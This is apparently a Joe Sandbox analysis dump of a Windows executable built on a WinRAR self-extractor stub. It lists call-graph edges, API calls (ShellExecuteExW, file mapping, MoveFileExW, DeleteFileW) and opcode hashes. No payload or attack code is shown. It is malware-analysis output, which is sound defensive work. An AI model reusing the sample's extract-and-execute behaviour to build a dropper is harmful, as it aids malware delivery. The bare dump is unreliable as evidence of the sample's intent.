25305->25259 25306->25256 25307->25264 25308->25262 25309->25046 25312 87a6a8 25311->25312 25313 87a727 FindNextFileW 25312->25313 25314 87a6c1 FindFirstFileW 25312->25314 25315 87a732 GetLastError 25313->25315 25321 87a709 25313->25321 25316 87a6d0 25314->25316 25314->25321 25315->25321 25317 87bb03 GetCurrentDirectoryW 25316->25317 25318 87a6e0 25317->25318 25319 87a6e4 FindFirstFileW 25318->25319 25320 87a6fe GetLastError 25318->25320 25319->25320 25319->25321 25320->25321 25321->24902 25322->24736 25323->24742 25324->24742 25325->24745 25326->24753 25328 879f42 78 API calls 25327->25328 25329 871fe8 25328->25329 25330 871a04 102 API calls 25329->25330 25333 872005 25329->25333 25331 871ff5 25330->25331 25331->25333 25334 87138b 74 API calls 25331->25334 25333->24761 25333->24762 25334->25333 25399 8894e0 GetClientRect 25432 8821e0 26 API calls std::bad_exception::bad_exception 25454 88f2e0 46 API calls __RTC_Initialize 25455 89bee0 GetCommandLineA GetCommandLineW 25336 88eae7 25337 88eaf1 25336->25337 25338 88e85d ___delayLoadHelper2@8 14 API calls 25337->25338 25339 88eafe 25338->25339 25400 88f4e7 29 API calls _abort 25433 87f1e8 FreeLibrary 25402 892cfb 38 API calls 4 library calls 25434 8795f0 80 API calls 25456 875ef0 82 API calls 25348 8998f0 25356 89adaf 25348->25356 25351 899904 25353 89990c 25354 899919 25353->25354 25364 899920 11 API calls 25353->25364 25357 89ac98 __dosmaperr 5 API calls 25356->25357 25358 89add6 25357->25358 25359 89adee TlsAlloc 25358->25359 25360 89addf 25358->25360 25359->25360 25361 88fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25360->25361 25362 8998fa 25361->25362 25362->25351 25363 899869 20 API calls 2 library calls 25362->25363 25363->25353 25364->25351 25365 89abf0 25367 89abfb 25365->25367 25366 89af0a 11 API calls 25366->25367 25367->25366 25368 89ac24 25367->25368 25369 89ac20 25367->25369 25371 89ac50 DeleteCriticalSection 25368->25371 25371->25369 25403 8988f0 7 API calls 
___scrt_uninitialize_crt 25436 88fd4f 9 API calls 2 library calls 25404 88a400 GdipDisposeImage GdipFree 25457 88d600 70 API calls 25405 896000 QueryPerformanceFrequency QueryPerformanceCounter 25439 892900 6 API calls 4 library calls 25458 89f200 51 API calls 25476 89a700 21 API calls 25478 871710 86 API calls 25441 88ad10 73 API calls 25409 871025 29 API calls 25411 89f421 21 API calls __vswprintf_c_l 25459 88c220 93 API calls _swprintf 25443 89b4ae 27 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25444 88f530 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 25481 88ff30 LocalFree 23504 89bb30 23505 89bb39 23504->23505 23506 89bb42 23504->23506 23508 89ba27 23505->23508 23528 8997e5 GetLastError 23508->23528 23510 89ba34 23548 89bb4e 23510->23548 23512 89ba3c 23557 89b7bb 23512->23557 23515 89ba53 23515->23506 23518 89ba96 23582 898dcc 23518->23582 23522 89ba91 23581 8991a8 20 API calls __dosmaperr 23522->23581 23524 89bada 23524->23518 23588 89b691 26 API calls 23524->23588 23525 89baae 23525->23524 23526 898dcc _free 20 API calls 23525->23526 23526->23524 23529 8997fb 23528->23529 23530 899801 23528->23530 23589 89ae5b 11 API calls 2 library calls 23529->23589 23534 899850 SetLastError 23530->23534 23590 89b136 23530->23590 23534->23510 23535 89981b 23537 898dcc _free 20 API calls 23535->23537 23539 899821 23537->23539 23538 899830 23538->23535 23540 899837 23538->23540 23541 89985c SetLastError 23539->23541 23598 899649 20 API calls __dosmaperr 23540->23598 23599 898d24 38 API calls _abort 23541->23599 23543 899842 23546 898dcc _free 20 API calls 23543->23546 23547 899849 23546->23547 23547->23534 23547->23541 23549 89bb5a __FrameHandler3::FrameUnwindToState 23548->23549 23550 8997e5 _unexpected 38 API calls 23549->23550 23554 89bb64 23550->23554 23552 89bbe8 _abort 23552->23512 23554->23552 23556 898dcc _free 20 API calls 23554->23556 23602 898d24 38 API calls _abort 23554->23602 
23603 89ac31 EnterCriticalSection 23554->23603 23604 89bbdf LeaveCriticalSection _abort 23554->23604 23556->23554 23605 894636 23557->23605 23560 89b7dc GetOEMCP 23562 89b805 23560->23562 23561 89b7ee 23561->23562 23563 89b7f3 GetACP 23561->23563 23562->23515 23564 898e06 23562->23564 23563->23562 23565 898e44 23564->23565 23569 898e14 __dosmaperr 23564->23569 23616 8991a8 20 API calls __dosmaperr 23565->23616 23567 898e2f RtlAllocateHeap 23568 898e42 23567->23568 23567->23569 23568->23518 23571 89bbf0 23568->23571 23569->23565 23569->23567 23615 897a5e 7 API calls 2 library calls 23569->23615 23572 89b7bb 40 API calls 23571->23572 23574 89bc0f 23572->23574 23573 89bc16 23627 88fbbc 23573->23627 23574->23573 23575 89bc85 _abort 23574->23575 23578 89bc60 IsValidCodePage 23574->23578 23617 89b893 GetCPInfo 23575->23617 23577 89ba89 23577->23522 23577->23525 23578->23573 23579 89bc72 GetCPInfo 23578->23579 23579->23573 23579->23575 23581->23518 23583 898dd7 RtlFreeHeap 23582->23583 23587 898e00 __dosmaperr 23582->23587 23584 898dec 23583->23584 23583->23587 23708 8991a8 20 API calls __dosmaperr 23584->23708 23586 898df2 GetLastError 23586->23587 23587->23515 23588->23518 23589->23530 23596 89b143 __dosmaperr 23590->23596 23591 89b183 23601 8991a8 20 API calls __dosmaperr 23591->23601 23592 89b16e RtlAllocateHeap 23594 899813 23592->23594 23592->23596 23594->23535 23597 89aeb1 11 API calls 2 library calls 23594->23597 23596->23591 23596->23592 23600 897a5e 7 API calls 2 library calls 23596->23600 23597->23538 23598->23543 23600->23596 23601->23594 23603->23554 23604->23554 23606 894649 23605->23606 23607 894653 23605->23607 23606->23560 23606->23561 23607->23606 23608 8997e5 _unexpected 38 API calls 23607->23608 23609 894674 23608->23609 23613 89993a 38 API calls __cftof 23609->23613 23611 89468d 23614 899967 38 API calls __cftof 23611->23614 23613->23611 23614->23606 23615->23569 23616->23568 23618 89b977 23617->23618 23624 89b8cd 23617->23624 23621 88fbbc 
__ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23618->23621 23623 89ba23 23621->23623 23623->23573 23634 89c988 23624->23634 23626 89ab78 __vswprintf_c_l 43 API calls 23626->23618 23628 88fbc4 23627->23628 23629 88fbc5 IsProcessorFeaturePresent 23627->23629 23628->23577 23631 88fc07 23629->23631 23707 88fbca SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 23631->23707 23633 88fcea 23633->23577 23635 894636 __cftof 38 API calls 23634->23635 23636 89c9a8 MultiByteToWideChar 23635->23636 23638 89ca7e 23636->23638 23639 89c9e6 23636->23639 23640 88fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23638->23640 23641 898e06 __vswprintf_c_l 21 API calls 23639->23641 23644 89ca07 _abort __vsnwprintf_l 23639->23644 23642 89b92e 23640->23642 23641->23644 23648 89ab78 23642->23648 23643 89ca78 23653 89abc3 20 API calls _free 23643->23653 23644->23643 23646 89ca4c MultiByteToWideChar 23644->23646 23646->23643 23647 89ca68 GetStringTypeW 23646->23647 23647->23643 23649 894636 __cftof 38 API calls 23648->23649 23650 89ab8b 23649->23650 23654 89a95b 23650->23654 23653->23638 23655 89a976 __vswprintf_c_l 23654->23655 23656 89a99c MultiByteToWideChar 23655->23656 23657 89a9c6 23656->23657 23668 89ab50 23656->23668 23661 898e06 __vswprintf_c_l 21 API calls 23657->23661 23666 89a9e7 __vsnwprintf_l 23657->23666 23658 88fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23659 89ab63 23658->23659 23659->23626 23660 89aa30 MultiByteToWideChar 23662 89aa49 23660->23662 23663 89aa9c 23660->23663 23661->23666 23681 89af6c 23662->23681 23690 89abc3 20 API calls _free 23663->23690 23666->23660 23666->23663 23668->23658 23669 89aaab 23671 898e06 __vswprintf_c_l 21 API calls 23669->23671 23675 89aacc __vsnwprintf_l 23669->23675 23670 89aa73 23670->23663 23672 89af6c __vswprintf_c_l 11 API calls 23670->23672 23671->23675 23672->23663 23673 89ab41 23689 89abc3 20 API calls _free 23673->23689 
23675->23673 23676 89af6c __vswprintf_c_l 11 API calls 23675->23676 23677 89ab20 23676->23677 23677->23673 23678 89ab2f WideCharToMultiByte 23677->23678 23678->23673 23679 89ab6f 23678->23679 23691 89abc3 20 API calls _free 23679->23691 23692 89ac98 23681->23692 23685 89afdc LCMapStringW 23686 89af9c 23685->23686 23687 88fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23686->23687 23688 89aa60 23687->23688 23688->23663 23688->23669 23688->23670 23689->23663 23690->23668 23691->23663 23693 89acc4 23692->23693 23694 89acc8 23692->23694 23693->23694 23696 89ace8 23693->23696 23700 89ad34 23693->23700 23694->23686 23699 89aff4 10 API calls 3 library calls 23694->23699 23696->23694 23697 89acf4 GetProcAddress 23696->23697 23698 89ad04 __dosmaperr 23697->23698 23698->23694 23699->23685 23701 89ad55 LoadLibraryExW 23700->23701 23704 89ad4a 23700->23704 23702 89ad8a 23701->23702 23703 89ad72 GetLastError 23701->23703 23702->23704 23705 89ada1 FreeLibrary 23702->23705 23703->23702 23706 89ad7d LoadLibraryExW 23703->23706 23704->23693 23705->23704 23706->23702 23707->23633 23708->23586 25414 89c030 GetProcessHeap 25416 88a440 GdipCloneImage GdipAlloc 25460 893a40 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25483 8a1f40 CloseHandle 24359 88cd58 24360 88ce22 24359->24360 24366 88cd7b 24359->24366 24376 88c793 _wcslen _wcsrchr 24360->24376 24387 88d78f 24360->24387 24363 88d40a 24365 881fbb CompareStringW 24365->24366 24366->24360 24366->24365 24367 88ca67 SetWindowTextW 24367->24376 24372 88c855 SetFileAttributesW 24374 88c90f GetFileAttributesW 24372->24374 24375 88c86f _abort _wcslen 24372->24375 24374->24376 24378 88c921 DeleteFileW 24374->24378 24375->24374 24375->24376 24415 87b991 51 API calls 2 library calls 24375->24415 24376->24363 24376->24367 24376->24372 24379 88cc31 GetDlgItem SetWindowTextW SendMessageW 24376->24379 24382 88cc71 SendMessageW 24376->24382 24386 881fbb CompareStringW 24376->24386 24410 88b314 
24376->24410 24414 88a64d GetCurrentDirectoryW 24376->24414 24416 87a5d1 6 API calls 24376->24416 24417 87a55a FindClose 24376->24417 24418 88b48e 76 API calls 2 library calls 24376->24418 24419 893e3e 24376->24419 24378->24376 24380 88c932 24378->24380 24379->24376 24381 874092 _swprintf 51 API calls 24380->24381 24383 88c952 GetFileAttributesW 24381->24383 24382->24376 24383->24380 24384 88c967 MoveFileW 24383->24384 24384->24376 24385 88c97f MoveFileExW 24384->24385 24385->24376 24386->24376 24389 88d799 _abort _wcslen 24387->24389 24388 88d9e7 24388->24376 24389->24388 24390 88d994 24389->24390 24391 88d8a5 24389->24391 24435 881fbb CompareStringW 24389->24435 24390->24388 24395 88d9de ShowWindow 24390->24395 24432 87a231 24391->24432 24395->24388 24396 88d8d9 ShellExecuteExW 24396->24388 24398 88d8ec 24396->24398 24400 88d910 IsWindowVisible 24398->24400 24401 88d925 WaitForInputIdle 24398->24401 24402 88d97b CloseHandle 24398->24402 24399 88d8d1 24399->24396 24400->24401 24403 88d91b ShowWindow 24400->24403 24404 88dc3b 6 API calls 24401->24404 24402->24390 24406 88d989 24402->24406 24403->24401 24405 88d93d 24404->24405 24405->24402 24408 88d950 GetExitCodeProcess 24405->24408 24437 881fbb CompareStringW 24406->24437 24408->24402 24409 88d963 24408->24409 24409->24402 24411 88b31e 24410->24411 24412 88b3f0 ExpandEnvironmentStringsW 24411->24412 24413 88b40d 24411->24413 24412->24413 24413->24376 24414->24376 24415->24375 24416->24376 24417->24376 24418->24376 24420 898e54 24419->24420 24421 898e6c 24420->24421 24422 898e61 24420->24422 24423 898e74 24421->24423 24430 898e7d __dosmaperr 24421->24430 24424 898e06 __vswprintf_c_l 21 API calls 24422->24424 24425 898dcc _free 20 API calls 24423->24425 24428 898e69 24424->24428 24425->24428 24426 898e82 24446 8991a8 20 API calls __dosmaperr 24426->24446 24427 898ea7 HeapReAlloc 24427->24428 24427->24430 24428->24376 24430->24426 24430->24427 24447 897a5e 7 API calls 2 library calls 24430->24447 24438 87a243 
24432->24438 24435->24391 24436 87b6c4 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW 24436->24399 24437->24390 24439 88ec50 24438->24439 24440 87a250 GetFileAttributesW 24439->24440 24441 87a261 24440->24441 24442 87a23a 24440->24442 24443 87bb03 GetCurrentDirectoryW 24441->24443 24442->24396 24442->24436 24444 87a275 24443->24444 24444->24442 24445 87a279 GetFileAttributesW 24444->24445 24445->24442 24446->24428 24447->24430 24479 89c051 31 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25417 88e455 14 API calls ___delayLoadHelper2@8 25462 898268 55 API calls _free 25418 88c793 107 API calls 4 library calls 25484 897f6e 52 API calls 3 library calls 25419 871075 84 API calls 25340 879a74 25343 879a7e 25340->25343 25341 879b9d SetFilePointer 25342 879bb6 GetLastError 25341->25342 25346 879ab1 25341->25346 25342->25346 25343->25341 25344 87981a 79 API calls 25343->25344 25345 879b79 25343->25345 25343->25346 25344->25345 25345->25341 25485 871f72 129 API calls __EH_prolog 25421 88a070 10 API calls 25463 88b270 99 API calls 25373 879f7a 25374 879f8f 25373->25374 25375 879f88 25373->25375 25376 879f9c GetStdHandle 25374->25376 25383 879fab 25374->25383 25376->25383 25377 87a003 WriteFile 25377->25383 25378 879fd4 WriteFile 25379 879fcf 25378->25379 25378->25383 25379->25378 25379->25383 25381 87a095 25385 876e98 77 API calls 25381->25385 25383->25375 25383->25377 25383->25378 25383->25379 25383->25381 25384 876baa 78 API calls 25383->25384 25384->25383 25385->25375

Control-flow Graph

APIs
  • Part of subcall function 00880863: GetModuleHandleW.KERNEL32(kernel32), ref: 0088087C
  • Part of subcall function 00880863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0088088E
  • Part of subcall function 00880863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 008808BF
  • Part of subcall function 0088A64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 0088A655
  • Part of subcall function 0088AC16: OleInitialize.OLE32(00000000), ref: 0088AC2F
  • Part of subcall function 0088AC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0088AC66
  • Part of subcall function 0088AC16: SHGetMalloc.SHELL32(008B8438), ref: 0088AC70
• GetCommandLineW.KERNEL32 ref: 0088DF5C
• OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0088DF83
• MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0088DF94
• UnmapViewOfFile.KERNEL32(00000000), ref: 0088DFCE
  • Part of subcall function 0088DBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0088DBF4
  • Part of subcall function 0088DBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0088DC30
• CloseHandle.KERNEL32(00000000), ref: 0088DFD7
• GetModuleFileNameW.KERNEL32(00000000,008CEC90,00000800), ref: 0088DFF2
• SetEnvironmentVariableW.KERNEL32(sfxname,008CEC90), ref: 0088DFFE
• GetLocalTime.KERNEL32(?), ref: 0088E009
• _swprintf.LIBCMT ref: 0088E048
• SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0088E05A
• GetModuleHandleW.KERNEL32(00000000), ref: 0088E061
• LoadIconW.USER32(00000000,00000064), ref: 0088E078
• DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 0088E0C9
• Sleep.KERNEL32(?), ref: 0088E0F7
• DeleteObject.GDI32 ref: 0088E130
• DeleteObject.GDI32(?), ref: 0088E140
• CloseHandle.KERNEL32 ref: 0088E183
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
• String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
• API String ID: 3049964643-3743209390

Control-flow Graph

APIs
• FindResourceW.KERNELBASE(?,PNG,00000000,?,?,?,0088B73D,00000066), ref: 0088A6D5
• SizeofResource.KERNEL32(00000000,?,?,?,0088B73D,00000066), ref: 0088A6EC
• LoadResource.KERNEL32(00000000,?,?,?,0088B73D,00000066), ref: 0088A703
• LockResource.KERNEL32(00000000,?,?,?,0088B73D,00000066), ref: 0088A712
• GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0088B73D,00000066), ref: 0088A72D
• GlobalLock.KERNEL32(00000000), ref: 0088A73E
• CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0088A762
• GlobalUnlock.KERNEL32(00000000), ref: 0088A7C6
  • Part of subcall function 0088A626: GdipAlloc.GDIPLUS(00000010), ref: 0088A62C
• GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0088A7A7
• GlobalFree.KERNEL32(00000000), ref: 0088A7CD
Similarity
• API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
• String ID: PNG
• API String ID: 211097158-364855578

Control-flow Graph

APIs
• FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0087A592,000000FF,?,?), ref: 0087A6C4
  • Part of subcall function 0087BB03: _wcslen.LIBCMT ref: 0087BB27
• FindFirstFileW.KERNEL32(?,?,?,?,00000800,?,?,?,?,0087A592,000000FF,?,?), ref: 0087A6F2
• GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0087A592,000000FF,?,?), ref: 0087A6FE
• FindNextFileW.KERNEL32(?,?,?,?,?,?,0087A592,000000FF,?,?), ref: 0087A728
• GetLastError.KERNEL32(?,?,?,?,0087A592,000000FF,?,?), ref: 0087A734
Similarity
• API ID: FileFind$ErrorFirstLast$Next_wcslen
• String ID:
• API String ID: 42610566-0
APIs
• GetCurrentProcess.KERNEL32(?,?,00897DC4,?,008AC300,0000000C,00897F1B,?,00000002,00000000), ref: 00897E0F
• TerminateProcess.KERNEL32(00000000,?,00897DC4,?,008AC300,0000000C,00897F1B,?,00000002,00000000), ref: 00897E16
• ExitProcess.KERNEL32 ref: 00897E28
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1703294689-0
                                                                                                                                                                                                    • Opcode ID: 1c95f02e99370dee0fa129a5f522b0a910fe834b227c6e4896e496017a822a75
                                                                                                                                                                                                    • Instruction ID: f073bc4111b72b434f834507802e08fe9178e46c8e6ed9b60c61eb969353da1d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1c95f02e99370dee0fa129a5f522b0a910fe834b227c6e4896e496017a822a75
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2EE04631110948AFDF02BF24DD4AA4A3F6AFF11741F084454F809CA532CB36DE52CA80
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: H_prolog
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3519838083-0
                                                                                                                                                                                                    • Opcode ID: f83c793efefddbaeeab8e283be92e96c09fcde47961f092b3e5d4ed900fe3e63
                                                                                                                                                                                                    • Instruction ID: d5a4669d35ea30c3d6c5f8a467d3b59dd29c5f315f6fad139941cb0b125adb53
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f83c793efefddbaeeab8e283be92e96c09fcde47961f092b3e5d4ed900fe3e63
                                                                                                                                                                                                    • Instruction Fuzzy Hash: AD82E770944145EEDF25DB64C899BFABBA9FF05300F0881B9E84DDB14ADB31DA84CB61
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: H_prolog
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3519838083-0
                                                                                                                                                                                                    • Opcode ID: bf1f2d9a1665274bc6f463f74a830873fdd84480874af68a3d70b07e32da67fd
                                                                                                                                                                                                    • Instruction ID: c8d06f9784ad1eaad21258d485b9374736e12151c60257f7b04fffc8be16e204
                                                                                                                                                                                                    • Opcode Fuzzy Hash: bf1f2d9a1665274bc6f463f74a830873fdd84480874af68a3d70b07e32da67fd
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C4D1B0B1A083458FDB14EF28C84475BBBE1FF89308F18456DE889DB242E774E915CB56
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog.LIBCMT ref: 0088B7E5
                                                                                                                                                                                                      • Part of subcall function 00871316: GetDlgItem.USER32(00000000,00003021), ref: 0087135A
                                                                                                                                                                                                      • Part of subcall function 00871316: SetWindowTextW.USER32(00000000,008A35F4), ref: 00871370
                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0088B8D1
                                                                                                                                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0088B8EF
                                                                                                                                                                                                    • IsDialogMessageW.USER32(?,?), ref: 0088B902
                                                                                                                                                                                                    • TranslateMessage.USER32(?), ref: 0088B910
                                                                                                                                                                                                    • DispatchMessageW.USER32(?), ref: 0088B91A
                                                                                                                                                                                                    • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 0088B93D
                                                                                                                                                                                                    • EndDialog.USER32(?,00000001), ref: 0088B960
                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000068), ref: 0088B983
                                                                                                                                                                                                    • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0088B99E
                                                                                                                                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,008A35F4), ref: 0088B9B1
                                                                                                                                                                                                      • Part of subcall function 0088D453: _wcslen.LIBCMT ref: 0088D47D
                                                                                                                                                                                                    • SetFocus.USER32(00000000), ref: 0088B9B8
                                                                                                                                                                                                    • _swprintf.LIBCMT ref: 0088BA24
                                                                                                                                                                                                      • Part of subcall function 00874092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008740A5
                                                                                                                                                                                                      • Part of subcall function 0088D4D4: GetDlgItem.USER32(00000068,008CFCB8), ref: 0088D4E8
                                                                                                                                                                                                      • Part of subcall function 0088D4D4: ShowWindow.USER32(00000000,00000005,?,?,?,0088AF07,00000001,?,?,0088B7B9,008A506C,008CFCB8,008CFCB8,00001000,00000000,00000000), ref: 0088D510
                                                                                                                                                                                                      • Part of subcall function 0088D4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0088D51B
                                                                                                                                                                                                      • Part of subcall function 0088D4D4: SendMessageW.USER32(00000000,000000C2,00000000,008A35F4), ref: 0088D529
                                                                                                                                                                                                      • Part of subcall function 0088D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0088D53F
                                                                                                                                                                                                      • Part of subcall function 0088D4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0088D559
                                                                                                                                                                                                      • Part of subcall function 0088D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0088D59D
                                                                                                                                                                                                      • Part of subcall function 0088D4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0088D5AB
                                                                                                                                                                                                      • Part of subcall function 0088D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0088D5BA
                                                                                                                                                                                                      • Part of subcall function 0088D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0088D5E1
                                                                                                                                                                                                      • Part of subcall function 0088D4D4: SendMessageW.USER32(00000000,000000C2,00000000,008A43F4), ref: 0088D5F0
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 0088BA68
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 0088BA90
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0088BAAE
                                                                                                                                                                                                    • _swprintf.LIBCMT ref: 0088BAC2
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000011), ref: 0088BAF4
                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 0088BB43
                                                                                                                                                                                                    • _swprintf.LIBCMT ref: 0088BB7C
                                                                                                                                                                                                    • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 0088BBD0
                                                                                                                                                                                                    • GetCommandLineW.KERNEL32 ref: 0088BBEA
                                                                                                                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 0088BC47
                                                                                                                                                                                                    • ShellExecuteExW.SHELL32(0000003C), ref: 0088BC6F
                                                                                                                                                                                                    • WaitForInputIdle.USER32(?,00002710), ref: 0088BCA5
                                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 0088BCB9
                                                                                                                                                                                                    • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 0088BCE2
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0088BCEB
                                                                                                                                                                                                    • _swprintf.LIBCMT ref: 0088BD1E
                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0088BD7D
                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,00000065,008A35F4), ref: 0088BD94
                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000065), ref: 0088BD9D
                                                                                                                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0088BDAC
                                                                                                                                                                                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0088BDBB
                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0088BE68
                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 0088BEBE
                                                                                                                                                                                                    • _swprintf.LIBCMT ref: 0088BEE8
                                                                                                                                                                                                    • SendMessageW.USER32(?,00000080,00000001,?), ref: 0088BF32
                                                                                                                                                                                                    • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 0088BF4C
                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000068), ref: 0088BF55
